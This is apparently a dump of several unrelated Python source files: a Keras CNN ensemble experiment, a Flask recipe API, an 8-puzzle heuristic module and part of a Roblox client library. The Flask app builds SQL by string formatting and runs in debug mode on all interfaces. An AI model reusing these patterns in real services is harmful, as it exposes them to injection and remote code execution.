floats\r\ntrain_images = train_images.astype('float32')\r\ntest_images = test_images.astype('float32')\r\n\r\n# Min-max normalisation of the data (scaling to the range between 0 and 1)\r\ndef normalization(m):\r\n    col_max = m.max(axis=0)\r\n    col_min = m.min(axis=0)\r\n    return (m - col_min) / (col_max - col_min)\r\n\r\ntrain_images = np.nan_to_num(normalization(train_images))\r\ntest_images = np.nan_to_num(normalization(test_images))\r\n\r\nprint('Class of the first instance in the training set: ', format(int(train_labels[0])))\r\nprint('Conversion of the class into a categorical (one-hot) attribute: ', train_labels_one_hot[0])\r\n\r\nclasses = np.unique(train_labels)  # 0...9\r\nnumClasses = len(classes)  # 10\r\ndataDimension = np.prod(train_data.shape[1:])  # 784\r\n\r\ndirectoryPath = './history/'\r\nif not os.path.exists(directoryPath):\r\n    os.makedirs(directoryPath)\r\n\r\ndef savePath(netNumber):\r\n    return directoryPath + 'network' + str(netNumber)\r\n\r\nnetNumber = 1\r\nprint(\"Creating neural network: {0}\".format(netNumber))\r\nmodel = Sequential()\r\nmodel.add(Conv2D(15, (4, 4), padding='same', strides=1, activation='relu', input_shape=input_shape))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(800, activation='relu'))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Dense(numClasses, activation='softmax'))\r\nsgd = keras.optimizers.SGD(lr=0.1, momentum=0.9)\r\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\r\nprint('Training the network....')\r\nearlyStopping = keras.callbacks.EarlyStopping(monitor='val_loss', patience=0, verbose=0, mode='auto')\r\nmodel.fit(train_images, train_labels_one_hot, callbacks=[earlyStopping], batch_size=250, epochs=100, verbose=2, validation_split=0.2, shuffle=True, class_weight=None, sample_weight=None)\r\n# Save the model to an HDF5 file\r\nmodel.save(savePath(netNumber))
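# --- Added sketch (not part of the original script): the network blocks above
# and below differ only in their dense-layer sizes and, for the third network,
# an extra convolution. A loop over a small config list would avoid the
# duplication; build_model is a hypothetical helper sketched under that
# assumption, reusing only names defined above (input_shape, numClasses,
# savePath, train_images, train_labels_one_hot).
def build_model(dense_units, input_shape, num_classes):
    m = Sequential()
    m.add(Conv2D(15, (4, 4), padding='same', strides=1, activation='relu', input_shape=input_shape))
    m.add(MaxPooling2D(pool_size=(2, 2)))
    m.add(Dropout(0.25))
    m.add(Flatten())
    m.add(Dense(dense_units, activation='relu'))
    m.add(Dropout(0.25))
    m.add(Dense(num_classes, activation='softmax'))
    m.compile(loss='categorical_crossentropy',
              optimizer=keras.optimizers.SGD(lr=0.1, momentum=0.9),
              metrics=['accuracy'])
    return m

# Possible usage, mirroring the explicit blocks in this file:
# for net_number, units in enumerate([800, 900, 700], start=1):
#     model = build_model(units, input_shape, numClasses)
#     model.fit(train_images, train_labels_one_hot, batch_size=250, epochs=100,
#               verbose=2, validation_split=0.2)
#     model.save(savePath(net_number))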
\r\n\r\nnetNumber = 1 + netNumber\r\nprint(\"Creating neural network: {0}\".format(netNumber))\r\nmodel = Sequential()\r\nmodel.add(Conv2D(15, (4, 4), padding='same', strides=1, activation='relu', input_shape=input_shape))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(900, activation='relu'))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Dense(numClasses, activation='softmax'))\r\nsgd = keras.optimizers.SGD(lr=0.1, momentum=0.9)\r\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\r\nprint('Training the network....')\r\nearlyStopping = keras.callbacks.EarlyStopping(monitor='val_loss', patience=0, verbose=0, mode='auto')\r\nmodel.fit(train_images, train_labels_one_hot, callbacks=[earlyStopping], batch_size=250, epochs=100, verbose=2, validation_split=0.2, shuffle=True, class_weight=None, sample_weight=None)\r\n# Save the model to an HDF5 file\r\nmodel.save(savePath(netNumber))\r\n\r\nnetNumber = 1 + netNumber\r\nprint(\"Creating neural network: {0}\".format(netNumber))\r\nmodel = Sequential()\r\nmodel.add(Conv2D(5, (5, 5), padding='same', strides=1, activation='relu', input_shape=input_shape))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Conv2D(10, (4, 4), padding='same', strides=1, activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(700, activation='relu'))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Dense(numClasses, activation='softmax'))\r\nsgd = keras.optimizers.SGD(lr=0.1, momentum=0.9)\r\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\r\nprint('Training the network....')\r\nearlyStopping = keras.callbacks.EarlyStopping(monitor='val_loss', patience=0, verbose=0, mode='auto')\r\nmodel.fit(train_images, train_labels_one_hot, callbacks=[earlyStopping], batch_size=250, epochs=100, verbose=2, validation_split=0.2, shuffle=True, class_weight=None, sample_weight=None)\r\n# Save the model to an HDF5 file\r\nmodel.save(savePath(netNumber))\r\n\r\n\r\n\r\n# ----------------- up to this point each of the networks is trained and saved\r\n\r\n\r\ndef ensemble_predictions():\r\n\r\n    pred_labels = []\r\n    test_accuracies = []\r\n\r\n    for i in range(1, netNumber+1):\r\n\r\n        model = keras.models.load_model(savePath(i))\r\n        lossAcc = model.evaluate(test_images, test_labels_one_hot)\r\n        print(i, '--test-set loss, test-set accuracy--', lossAcc)\r\n        acc = lossAcc[1]\r\n        test_accuracies.append(acc)\r\n        predictedLabels = model.predict(test_images)\r\n        pred_labels.append(predictedLabels)\r\n\r\n    return np.array(test_accuracies),\\\r\n           np.array(pred_labels)\r\n\r\ntest_accuracies, pred_labels = ensemble_predictions()\r\n\r\nend = time.time()\r\nelapsed = end - start\r\nprint(\"Execution time: \" + str(timedelta(seconds=int(round(elapsed)))))\r\n\r\nprint(\"Shape of the labels predicted by all networks\", pred_labels.shape)  # netNumber, 10000, 10\r\nprint(\"Shape of the test accuracies from all networks\", test_accuracies.shape)
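# --- Added sketch (not part of the original script): the analysis below
# combines the networks by averaging their softmax outputs. A common
# alternative is hard majority voting over each network's argmax; a minimal,
# hedged sketch over the pred_labels array built just above
# (shape: n_nets x n_samples x n_classes):
def majority_vote(pred_labels):
    votes = np.argmax(pred_labels, axis=2)  # (n_nets, n_samples)
    n_classes = pred_labels.shape[2]
    # Count the votes per class for every sample, then pick the most voted class.
    counts = np.apply_along_axis(lambda col: np.bincount(col, minlength=n_classes), 0, votes)
    return np.argmax(counts, axis=0)  # (n_samples,)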
\r\n\r\n\r\n# Ensemble prediction\r\nensemble_labelsPrediction = np.mean(pred_labels, axis=0)  # 10000, 10\r\nensemble_classPrediction = np.argmax(ensemble_labelsPrediction, axis=1)  # 10000, 1\r\n\r\n#print(\"test class\", test_labels.shape)\r\n#print(test_labels)\r\ntest_labels = test_labels.reshape((10000,))\r\n#print(\"test class\", test_labels.shape)\r\n#print(test_labels)\r\n\r\nensemble_correct = (ensemble_classPrediction == test_labels)  # boolean array\r\nensemble_incorrect = np.logical_not(ensemble_correct)\r\n\r\n\r\n# Best-network prediction\r\n# test_accuracies is e.g. array([ 0.9893, 0.988 , 0.9893, 0.9889, 0.9892])\r\nprint(test_accuracies)\r\nbest_net = np.argmax(test_accuracies)\r\nprint('Number of the best neural network:', best_net + 1)\r\nbestNet_labelsPrediction = pred_labels[best_net, :, :]  # 0, 10000, 10\r\nbestNet_classPrediction = np.argmax(bestNet_labelsPrediction, axis=1)\r\n\r\nbestNet_correct = (bestNet_classPrediction == test_labels)  # boolean array\r\nbestNet_incorrect = np.logical_not(bestNet_correct)\r\n\r\n# Printing the results\r\nprint('Number of correctly classified instances by the ensemble:', np.sum(ensemble_correct))\r\nprint('Number of correctly classified instances by the best network:', np.sum(bestNet_correct))\r\n\r\nensemble_better = np.logical_and(bestNet_incorrect, ensemble_correct)  # [1,0,1,0,0]\r\nprint('Number of instances where the ensemble of networks turned out to be a better classifier than the best network:', ensemble_better.sum())\r\n\r\nbestNet_better = np.logical_and(bestNet_correct, ensemble_incorrect)  # [1,0,1,0,0]\r\nprint('Number of instances where the best network turned out to be a better classifier than the ensemble of networks:', bestNet_better.sum())\r\n\r\nprint('Test-set accuracy (best network):', test_accuracies[best_net])\r\nprint('Test-set accuracy (ensemble):', ensemble_correct.mean())\r\n\r\ntest_images = test_data.reshape(test_data.shape[0], img_rows, img_cols)\r\n\r\n# Plotting images _____________________________________________________________________________\r\ndef plot_images_comparison(idx):\r\n    plot_images(images=test_images[idx, :],\r\n                trueClass=test_labels[idx],\r\n                ensembleClassPrediction=ensemble_classPrediction[idx],\r\n                bestClassPrediction=bestNet_classPrediction[idx])\r\n\r\n# Printing labels _____________________________________________________________________________\r\ndef print_labels(labels, idx, num=1):\r\n    labels = labels[idx, :]\r\n    labels = labels[0:num, :]\r\n    labels_rounded = np.round(labels, 2)\r\n    print(labels_rounded)\r\n\r\ndef print_labels_ensemble(idx, **kwargs):\r\n    print_labels(labels=ensemble_labelsPrediction, idx=idx, **kwargs)  # labels = all output labels predicted by the ensemble\r\n    # idx = [1,0,1,0]\r\n    # **kwargs = lets us change the number of labels that will be printed\r\n\r\ndef print_labels_best_net(idx, **kwargs):\r\n    print_labels(labels=bestNet_labelsPrediction, idx=idx, **kwargs)  # labels = all output labels predicted by the best network\r\n    # idx = [1,0,1,0]\r\n    # **kwargs = lets us change the number of labels that will be printed\r\n\r\nprint_labels_ensemble(idx=ensemble_better, num=1)  # num = how many labels to print (**kwargs instead)\r\nprint_labels_best_net(idx=ensemble_better, num=1)\r\n\r\nprint_labels_ensemble(idx=bestNet_better, num=1)\r\nprint_labels_best_net(idx=bestNet_better, num=1)
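# --- Added sketch (not part of the original script): the two counts printed
# above are the off-diagonal cells of a 2x2 McNemar-style agreement table;
# the full table, built from the boolean arrays defined earlier, is sometimes
# easier to read:
agreement_table = np.array([
    [np.sum(ensemble_correct & bestNet_correct), np.sum(ensemble_correct & bestNet_incorrect)],
    [np.sum(ensemble_incorrect & bestNet_correct), np.sum(ensemble_incorrect & bestNet_incorrect)],
])
# Rows: ensemble correct/incorrect; columns: best network correct/incorrect.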
\r\n\r\nplot_images_comparison(idx=ensemble_better)\r\nplot_images_comparison(idx=bestNet_better)\r\n\r\n\r\n","sub_path":"ensembleKeraDifferentNets.py","file_name":"ensembleKeraDifferentNets.py","file_ext":"py","file_size_in_byte":13776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"531001601","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\nfrom flask import Flask, url_for\nfrom flask import request\nimport json\n\nfrom entity.menu_detail import ResData, errorRes\nfrom db import db\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n    return 'Hello !'\n\n\ndef getSteps(id):\n    with db.get_dbconn() as conn:\n        cur = conn.cursor()\n        cur.execute(\"select * from menusteps where menudetailId = %s\" % str(id))\n        res = [dict(id=row[0], step=row[2], detail=row[3]) for row in cur.fetchall()]\n\n    return res\n\n\ndef getThings(id):\n    with db.get_dbconn() as conn:\n        cur = conn.cursor()\n        cur.execute(\"select * from menuthings where menudetailId = %s\" % str(id))\n        res = [dict(id=row[0], name=row[2], unit=row[3]) for row in cur.fetchall()]\n\n    return res\n\n\n@app.route('/menu/list')\ndef menu_list():\n    limit = int(request.args.get(\"limit\", 20))\n    cursor = int(request.args.get(\"cursor\", 0))\n    conn = db.get_dbconn()\n    dbcursor = conn.cursor()\n    resData = ResData()\n    if limit != 0:\n        sql = \"select * from menudetail where id > %d limit %d\" % (cursor, limit)\n        dbcursor.execute(sql)\n        rows = dbcursor.fetchall()\n        resData.data = dict(\n            items=[dict(id=row[0], name=row[1], url=row[2], title=row[3], imgurl=row[4], desc=row[5], steps=getSteps(row[0]), things=getThings(row[0])) for row in rows])\n        resData.data[\"nextCursor\"] = rows[-1][0]\n\n    dbcursor.execute(\"select 1 from menudetail\")\n    resData.data[\"totalCount\"] = dbcursor.fetchall().__len__()\n    res = resData.toJsonRES()\n    dbcursor.close()\n    conn.commit()\n    return res\n\n\n@app.route('/menu/item')\ndef menu_detail():\n    id = int(request.args.get(\"id\"))\n    with db.get_dbconn() as conn:\n        cur = conn.cursor()\n        cur.execute(\"select * from main.menudetail where id = %d\" % id)\n        row = cur.fetchall()[0]\n        resData = ResData(data=dict(id=row[0], name=row[1], url=row[2], title=row[3], imgurl=row[4], desc=row[5],\n                                    steps=getSteps(row[0]), things=getThings(row[0])))\n    if resData is not None:\n        return resData.toJsonRES()\n    else:\n        return errorRes(10000, \"Error\")\n\n\n@app.route('/menu/item/countnum/')\n@app.route('/menu/item/countnum/<int:index>')\ndef menu_countnum(index=0):\n    with db.get_dbconn() as conn:\n        cur = conn.cursor()\n        cur.execute(\"select * from menudetail limit %d,1\" % index)\n        row = cur.fetchone()\n        resData = ResData(data=dict(id=row[0], name=row[1], url=row[2], title=row[3], imgurl=row[4], desc=row[5],\n                                    steps=getSteps(row[0]), things=getThings(row[0])))\n\n    if resData is not None:\n        return resData.toJsonRES()\n    else:\n        return errorRes(10000, \"Error\")\n\n\nif __name__ == '__main__':\n    app.config['DEBUG'] = True\n    app.run(load_dotenv=False, host='0.0.0.0')\n","sub_path":"menuflask/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"590447916","text":"from search import astar\nfrom puzzle import State\nfrom util import import_pickled, 
int_to_num_list, num_list_to_int\nfrom itertools import combinations, chain\nfrom copy import deepcopy\nimport pickle\n\n\nxy_db = []\n\n\ndef import_xy_db(filename='hxy_db.pickle'):\n global xy_db\n try:\n xy_db = import_pickled(filename)\n except FileNotFoundError:\n response = input('Unable to locate pre-calculated X-Y heuristics database in file \"' + filename + '\". ' +\n 'Would you like to pre-calculate the X-Y heuristic now and save it to this file? (y/n)')\n if response == 'y':\n generate_hxy_db(filename)\n import_xy_db(filename)\n\n\ndef strips_to_str(strips):\n return ''.join([str(num) for num in chain(*strips)])\n\n\ndef strips_to_sequence(strips):\n return list(chain(*strips))\n\n\ndef sort_strips(strips):\n return [sorted(strip) for strip in strips]\n\n\ndef xy_sequence_from_state(state, dimension):\n xy_sequence = None\n if dimension == 'row':\n xy_sequence = state.get_rows()\n elif dimension == 'col':\n xy_sequence = state.get_cols()\n\n xy_sequence = sort_strips(xy_sequence)\n xy_sequence = strips_to_sequence(xy_sequence)\n return xy_sequence\n\n\nclass XYState(State):\n\n def __init__(self, state=None, strips=None, dimension='row', **kwargs):\n\n if state:\n sequence = xy_sequence_from_state(state, dimension)\n elif strips:\n strips = sort_strips(strips)\n sequence = strips_to_sequence(strips)\n\n State.__init__(self, sequence, **kwargs)\n\n def get_children(self):\n strips = self.get_rows()\n empty = 0\n for strip_index, strip in enumerate(strips):\n if self.empty in strip:\n empty = strip_index\n break\n\n adjacent = [empty - 1, empty + 1] # Assume middle\n if empty % self.side_length == 0: # Left edge\n adjacent = [empty + 1]\n elif (empty+1) % self.side_length == 0: # Right edge\n adjacent = [empty - 1]\n\n children = []\n for adjacent_strip in adjacent:\n for cell in strips[adjacent_strip]:\n child_strips = deepcopy(strips)\n child_strips[empty].remove(self.empty)\n child_strips[empty].append(cell)\n child_strips[adjacent_strip].remove(cell)\n child_strips[adjacent_strip].append(self.empty)\n children.append(XYState(strips=child_strips))\n return children\n\n\ndef h_xy_manhattan(start, goal):\n def find_in_strips(strips, value):\n for strip_num, strip in enumerate(strips):\n if value in strip:\n return strip_num\n\n score = 0\n\n start_strips = start.get_rows()\n goal_strips = goal.get_rows()\n\n for i in range(1, 9):\n score += abs(find_in_strips(start_strips, i) - find_in_strips(goal_strips, i))\n\n return {'value': score, 'nodes': 0}\n\n\ndef hxy(start, goal, precalculated=False):\n\n result = 0\n nodes = 0\n\n for dimension in ['row', 'col']:\n start_xy = XYState(start, dimension=dimension)\n goal_xy = XYState(goal, dimension=dimension)\n\n if precalculated:\n if start.side_length != 3:\n raise NotImplementedError('Precalculated X-Y heuristic is only implemented for the 8-puzzle')\n result += xy_db[str(num_list_to_int(start_xy.sequence)) + '_' + str(num_list_to_int(goal_xy.sequence))]\n else:\n dimension_result = astar(start_xy, goal_xy, heuristic=h_xy_manhattan)\n result += len(dimension_result['solution'])-1\n nodes += dimension_result['total_nodes']\n\n return {'value': result, 'nodes': nodes}\n\n\ndef hxy_precalculated(start, goal):\n if not xy_db:\n import_xy_db()\n return hxy(start, goal, precalculated=True)\n\n\ndef row_strips_to_str(strips):\n return ''.join([str(val) for val in chain(strips)])\n\n\ndef get_state_set_key(state_a, state_b):\n return row_strips_to_str(state_a) + '_' + row_strips_to_str(state_b)\n\n\ndef get_all_xy_start_states():\n 
full_tile_set = set(range(1, 10))\n    states = []\n    for strip_a in combinations(full_tile_set, 3):\n        remaining_tiles = full_tile_set - set(strip_a)\n        for strip_b in combinations(remaining_tiles, 3):\n            remaining_tiles = full_tile_set - set(strip_a) - set(strip_b)\n            for strip_c in combinations(remaining_tiles, 3):\n                strips = strips_to_sequence([strip_a, strip_b, strip_c])\n                states.append(strips)\n    return states\n\n\ndef generate_hxy_db(filename):\n\n    states = get_all_xy_start_states()\n    xy_db = {}\n\n    for start_index, start in enumerate(states):\n\n        start = XYState(start)\n        frontier = [start]\n        explored = set()\n\n        while frontier:\n            node = frontier.pop(0)\n            explored.add(node)\n\n            # Key format must match the lookup done in hxy() above\n            xy_db[str(num_list_to_int(start.sequence)) + '_' + str(num_list_to_int(node.sequence))] = node.path_cost\n\n            children = node.get_children()\n            for child in children:\n                child.path_cost = node.path_cost+1\n                if child not in frontier and child not in explored:\n                    frontier.append(child)\n\n        print('\\r' + str(start_index) + ' states processed. ' +\n              str(len(xy_db.keys())) + ' entries in database.',\n              end='', flush=True)\n\n    with open(filename, 'wb') as file:\n        pickle.dump(xy_db, file)\n\n\ndef hxy_new(start, goal):\n\n    def get_strips(node, dimension):\n        strips = None\n        if dimension == 'row':\n            strips = node.get_rows()\n        elif dimension == 'col':\n            strips = node.get_cols()\n        strips = [set(strip) for strip in strips]\n        return strips\n\n    def get_strip_num(strips, value):\n        for strip_num, strip in enumerate(strips):\n            if value in strip:\n                return strip_num\n\n    def first_unmatching_strip(start, goal):\n        for strip_num, strip_pair in enumerate(zip(start, goal)):\n            if strip_pair[0] != strip_pair[1]:\n                return strip_num\n\n    def swap_in_strips(strips, a, b):\n        for strip in strips:\n            if a in strip:\n                strip.remove(a)\n                strip.add(b)\n                continue\n            if b in strip:\n                strip.remove(b)\n                strip.add(a)\n\n    def x_y_score_for_strips(start, goal, empty):\n        score = 0\n        while start != goal:\n            empty_strip = get_strip_num(start, empty)\n            if start[empty_strip] == goal[empty_strip]:\n                target_strip_for_swap = first_unmatching_strip(start, goal)\n                target_num_for_swap = (start[target_strip_for_swap]-goal[target_strip_for_swap]).pop()\n            else:\n                target_num_for_swap = (goal[empty_strip]-start[empty_strip]).pop()\n            swap_in_strips(start, target_num_for_swap, empty)\n            score += 1\n        return score\n\n    # CURRENTLY ALLOWS SWAPPING BETWEEN NON-ADJACENT STRIPS--NEED TO FIX THIS\n    score = 0\n    for dimension in ['row', 'col']:\n        start_strips = get_strips(start, dimension)\n        goal_strips = get_strips(goal, dimension)\n        score += x_y_score_for_strips(start_strips, goal_strips, start.empty)\n\n    return {'value': score, 'nodes': 0}","sub_path":"hxy.py","file_name":"hxy.py","file_ext":"py","file_size_in_byte":7292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
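# --- Added sketch (not part of either neighbouring file): minimal usage of
# the X-Y heuristic from hxy.py above. The State constructor signature is an
# assumption inferred from how XYState wraps it, so the sketch is kept
# commented out:
#
# from puzzle import State
# from hxy import hxy
#
# start = State([1, 2, 3, 4, 5, 6, 8, 7, 9])   # flat 8-puzzle tile sequence
# goal = State([1, 2, 3, 4, 5, 6, 7, 8, 9])
# result = hxy(start, goal)   # solves the row and column relaxations with A*
# print(result['value'], 'lower-bound moves;', result['nodes'], 'nodes expanded')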
 +{"seq_id":"341041538","text":"\"\"\"\r\nCopyright (c) 2017 James Patrick Dill, reshanie\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n\"\"\"\r\n\r\nimport datetime\r\nimport logging\r\nfrom collections import namedtuple\r\nfrom json import JSONDecodeError\r\n\r\nimport faste\r\n\r\nfrom . import utils, enums, errors\r\n\r\nlog = logging.getLogger(\"roblox\")\r\n\r\n\r\nclass Asset(object):\r\n    \"\"\"Roblox Asset object.\r\n\r\n    Use :meth:`RobloxSession.get_asset` to get a specific asset.\r\n\r\n    Attributes\r\n    ----------\r\n    name : str\r\n        Asset name\r\n    description : str\r\n        Asset description\r\n    id : int\r\n        Asset ID\r\n    product_id : Optional[int]\r\n        Product ID\r\n    asset_type : :class:`roblox.AssetType`\r\n        Asset type\r\n    created : :class:`datetime.datetime`\r\n        When the asset was first created\r\n    updated : :class:`datetime.datetime`\r\n        When the asset was last updated\r\n    price : Optional[int]\r\n        Price of the asset in ROBUX\r\n    sales : Optional[int]\r\n        Total sales of the asset\r\n    is_new : bool\r\n        Whether Roblox considers the asset 'new'\r\n    for_sale : bool\r\n        Whether asset can be taken/bought\r\n    public_domain : bool\r\n        If the asset is public domain / publicly viewable\r\n    limited : bool\r\n        If the asset is limited\r\n    limited_unique : bool\r\n        If the asset is limited and unique\r\n    remaining : Optional[int]\r\n        How many are remaining, if the asset is limited\r\n    membership_level: :class:`roblox.Membership`\r\n        Minimum Builders Club needed to take the asset\r\n    \"\"\"\r\n\r\n    def __init__(self, client, asset_id=0):\r\n        \"\"\":param client: client\r\n        :type client: roblox.RobloxSession\r\n        \"\"\"\r\n\r\n        self.client = client\r\n\r\n        self.id = asset_id\r\n\r\n        self._update_info()\r\n\r\n    def _update_info(self):\r\n        try:\r\n            product_info = self.client.http.product_info(self.id)\r\n        except JSONDecodeError:\r\n            raise errors.BadRequest(\"Invalid asset, possibly deleted\")\r\n\r\n        self.product_id = product_info.get(\"ProductId\")\r\n        self.name = product_info.get(\"Name\")\r\n        self.description = product_info.get(\"Description\")\r\n\r\n        self.asset_type = enums.AssetType(product_info.get(\"AssetTypeId\"))\r\n        self.icon_image_asset_id = product_info.get(\"IconImageAssetId\")\r\n\r\n        self.created = utils.get_datetime(product_info.get(\"Created\"))\r\n        self.updated = utils.get_datetime(product_info.get(\"Updated\"))\r\n\r\n        self.price = product_info.get(\"PriceInRobux\")\r\n        self.sales = product_info.get(\"Sales\")\r\n        self.is_new = product_info.get(\"IsNew\")\r\n        self.for_sale = product_info.get(\"IsForSale\")\r\n        self.public_domain = product_info.get(\"IsPublicDomain\")\r\n\r\n        self.unique = product_info.get(\"IsLimitedUnique\")\r\n        self.limited = product_info.get(\"IsLimited\") or self.unique\r\n        self.remaining = product_info.get(\"Remaining\")\r\n\r\n        self.membership_level = enums.Membership(product_info.get(\"MinimumMembershipLevel\"))\r\n\r\n        self.creator_id = product_info[\"Creator\"][\"CreatorTargetId\"]\r\n        self.creator_type = product_info[\"Creator\"][\"CreatorType\"]\r\n\r\n    def __hash__(self):\r\n        return self.id\r\n\r\n    def __repr__(self):\r\n        return \"<Asset id={0.id} name={0.name!r}>\".format(self)\r\n\r\n    def __str__(self):\r\n        return self.name\r\n\r\n    def __eq__(self, other):\r\n        \"\"\"\r\n        Returns True if two asset objects 
are the same asset.\r\n \"\"\"\r\n if type(other) != Asset:\r\n return False\r\n return self.id == other.id\r\n\r\n @property\r\n @faste.decor.rr_cache()\r\n def creator(self):\r\n \"\"\"Asset creator\r\n\r\n :returns: :class:`User` or :class:`Group`\"\"\"\r\n if self.creator_type == \"User\":\r\n return self.client.get_user(user_id=self.creator_id)\r\n else:\r\n return self.client.get_group(self.creator_id)\r\n\r\n def buy(self):\r\n \"\"\"\r\n Takes/buys asset.\r\n\r\n :returns: `True` if successful\r\n \"\"\"\r\n return self.client.http.buy_product(self.product_id,\r\n self.price,\r\n self.creator_id)\r\n\r\n def remove_from_inventory(self):\r\n \"\"\"\r\n Deletes asset from inventory of client user.\r\n\r\n :returns: `True` if successful\r\n \"\"\"\r\n return self.client.http.delete_from_inventory(self.id)\r\n\r\n def post_comment(self, content):\r\n \"\"\"\r\n Posts comment on asset\r\n\r\n :param str content: Comment text\r\n\r\n :return: :class:`Comment`\r\n \"\"\"\r\n if not content:\r\n raise errors.BadRequest(\"Comment must have text.\")\r\n comment = self.client.http.post_comment(self.id, content)\r\n\r\n return Comment(self, content=comment[\"Text\"], created=comment[\"PostedDate\"], author=self.client.me)\r\n\r\n def owned_by(self, user):\r\n \"\"\"\r\n Checks if asset is owned by user.\r\n\r\n :param user: User\r\n :type user: :class:`User`\r\n :returns: `True` if user owns asset\r\n \"\"\"\r\n return self.client.http.user_owns_asset(user.id, self.id)\r\n\r\n @property\r\n @faste.decor.rr_cache()\r\n def icon(self):\r\n \"\"\"Asset for icon\r\n\r\n :returns: Optional[:class:`Asset`]\"\"\"\r\n if self.icon_image_asset_id == 0:\r\n return None\r\n\r\n return self.client.get_asset(self.icon_image_asset_id)\r\n\r\n @property\r\n def favorites(self):\r\n \"\"\"Favorite count of asset\r\n\r\n :returns: int\"\"\"\r\n return self.client.http.asset_favorites(self.id)\r\n\r\n def is_favorited(self):\r\n \"\"\"Whether asset is favorited by client\r\n\r\n :returns: bool\"\"\"\r\n return self.client.http.is_favorited(self.id)\r\n\r\n def favorite(self):\r\n \"\"\"Favorites asset if it isn't favorited already.\r\n\r\n :returns: return value of :meth:`is_favorited` (bool)\"\"\"\r\n if self.is_favorited():\r\n return True\r\n\r\n return self.client.http.toggle_favorite(self.id)\r\n\r\n def unfavorite(self):\r\n \"\"\"Unfavorites asset if it's favorited.\r\n\r\n :returns: return value of :meth:`is_favorited` (bool)\"\"\"\r\n if not self.is_favorited():\r\n return False\r\n\r\n return not self.client.http.toggle_favorite(self.id)\r\n\r\n def recent_average_price(self):\r\n \"\"\"Gets RAP of asset, if it is a collectible.\r\n\r\n :returns: Optional[`int`]\"\"\"\r\n return self.client.http.get_sales_data(self.id).get(\"AveragePrice\")\r\n\r\n def RAP(self):\r\n \"\"\"Alias for :meth:recent_average_pice\"\"\"\r\n return self.recent_average_price()\r\n\r\n def sales_chart(self):\r\n \"\"\"Gets :class:`SalesChart` for asset, if it's a collectible.\"\"\"\r\n\r\n return SalesChart(self.client, self)\r\n\r\n\r\nclass Game(Asset):\r\n pass\r\n\r\n\r\nsales_point = namedtuple(\"sales_day\", \"date price volume\")\r\n\r\n\r\nclass SalesChart(object):\r\n \"\"\"Asset sales chart, representing user sales of a collectible.\r\n\r\n You can also iterate over this object, and index it. 
``SalesChart[0]`` will return the first sales point.\r\n You can also use ::\r\n >>> list(chart)\r\n >>> reversed(chart)\r\n >>> dict(chart)\r\n >>> len(chart)\r\n >>> datetime.date in chart\r\n\r\n The dict version and list versions' values are namedtuples representing sales points, with ``sales_point.date``\r\n , ``sales_point.price`` , and ``sales_point.volume``\r\n\r\n The dict's keys are :class:`datetime.date`\r\n\r\n Attributes\r\n ----------\r\n asset : :class:`Asset`\r\n Asset the sales chart belongs to\r\n chart_dict : dict\r\n dict version of the sales chart\r\n \"\"\"\r\n\r\n def __init__(self, client, asset):\r\n self.client = client\r\n self.asset = asset\r\n\r\n self.chart_dict = self._chart_dict()\r\n\r\n def _chart_dict(self):\r\n sales_data = self.client.http.get_sales_data(self.asset.id)\r\n if not sales_data:\r\n raise ValueError(\"{!r} isn't a collectible and has no sales data\".format(self.asset))\r\n\r\n sales_chart = sales_data.get(\"HundredEightyDaySalesChart\").split(\"|\")\r\n volume_chart = sales_data.get(\"HundredEightyDayVolumeChart\").split(\"|\")\r\n\r\n sales_chart_dict = {}\r\n for sale in sales_chart:\r\n ts = sale.split(\",\")\r\n if not ts[0]:\r\n break\r\n\r\n k = int(ts[0][:-3])\r\n sales_chart_dict[k] = int(ts[1])\r\n\r\n volume_chart_dict = {}\r\n for vol in volume_chart:\r\n tv = vol.split(\",\")\r\n if not tv[0]:\r\n break\r\n\r\n k = int(tv[0][:-3])\r\n volume_chart_dict[k] = int(tv[1])\r\n\r\n rtd = {}\r\n for timestamp in sales_chart_dict:\r\n nts = datetime.date.fromtimestamp(timestamp)\r\n\r\n rtd[nts] = sales_point(\r\n date=nts,\r\n price=sales_chart_dict.get(timestamp),\r\n volume=volume_chart_dict.get(timestamp) or 0,\r\n )\r\n\r\n return rtd\r\n\r\n def 